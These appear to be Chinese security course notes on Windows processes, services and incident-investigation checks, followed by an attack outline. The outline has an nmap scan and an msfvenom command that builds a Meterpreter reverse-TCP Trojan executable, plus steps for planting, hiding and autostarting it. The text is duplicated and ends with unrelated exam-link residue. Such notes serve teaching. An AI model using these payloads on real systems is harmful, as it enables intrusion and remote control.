1.Windows进程是一个正在运行的程序实例正在运行。2.服务是一种特殊的、长期在后台运行的程序不需要用户使用也会运行。3.Windows排查手段进程排查、网络连接排查、启动项排查、服务排查、计划任务排查、系统账户排查日志排查计算机管理根据事件、用户、事件ID46254.第三方应用程序漏洞非操作系统本身程序来源于个人下载。前提1目标IP地址2安装且运行了具有漏洞的程序步骤1扫描端口nmap -p 端口号范围 目标IP2根据扫出的端口运行网站适当运行拓展找到对应端口http:\\目标IP扫出的端口号5.制作木马病毒msfconsole # 启动 Metasploit # ⽣成反向连接⽊⻢reverse_tcp⽬标机主动连接攻击机 msfvenom -p windows/meterpreter/reverse_tcp LHOST192.168.157.129 LPORT9999 -f exe shell.exe制作——投放入网站——执行——复制隐藏、自启动——连接完成操作
课程记录:Windows2
发布时间:2026/6/29 14:38:25
1.Windows进程是一个正在运行的程序实例正在运行。2.服务是一种特殊的、长期在后台运行的程序不需要用户使用也会运行。3.Windows排查手段进程排查、网络连接排查、启动项排查、服务排查、计划任务排查、系统账户排查日志排查计算机管理根据事件、用户、事件ID46254.第三方应用程序漏洞非操作系统本身程序来源于个人下载。前提1目标IP地址2安装且运行了具有漏洞的程序步骤1扫描端口nmap -p 端口号范围 目标IP2根据扫出的端口运行网站适当运行拓展找到对应端口http:\\目标IP扫出的端口号5.制作木马病毒msfconsole # 启动 Metasploit # ⽣成反向连接⽊⻢reverse_tcp⽬标机主动连接攻击机 msfvenom -p windows/meterpreter/reverse_tcp LHOST192.168.157.129 LPORT9999 -f exe shell.exe制作——投放入网站——执行——复制隐藏、自启动——连接完成操作
实现100%通过率](http://pic.xiahunao.cn/yaotu/华为OD机试2025C卷-字符串变换最小次数[100分]( Java _ Python3 _ C++ _ C语言 _ JsNode _ Go)实现100%通过率)
实现100%通过率](http://pic.xiahunao.cn/yaotu/华为OD机试2025C卷-内存资源分配[100分]( Java _ Python3 _ C++ _ C语言 _ JsNode _ Go)实现100%通过率)
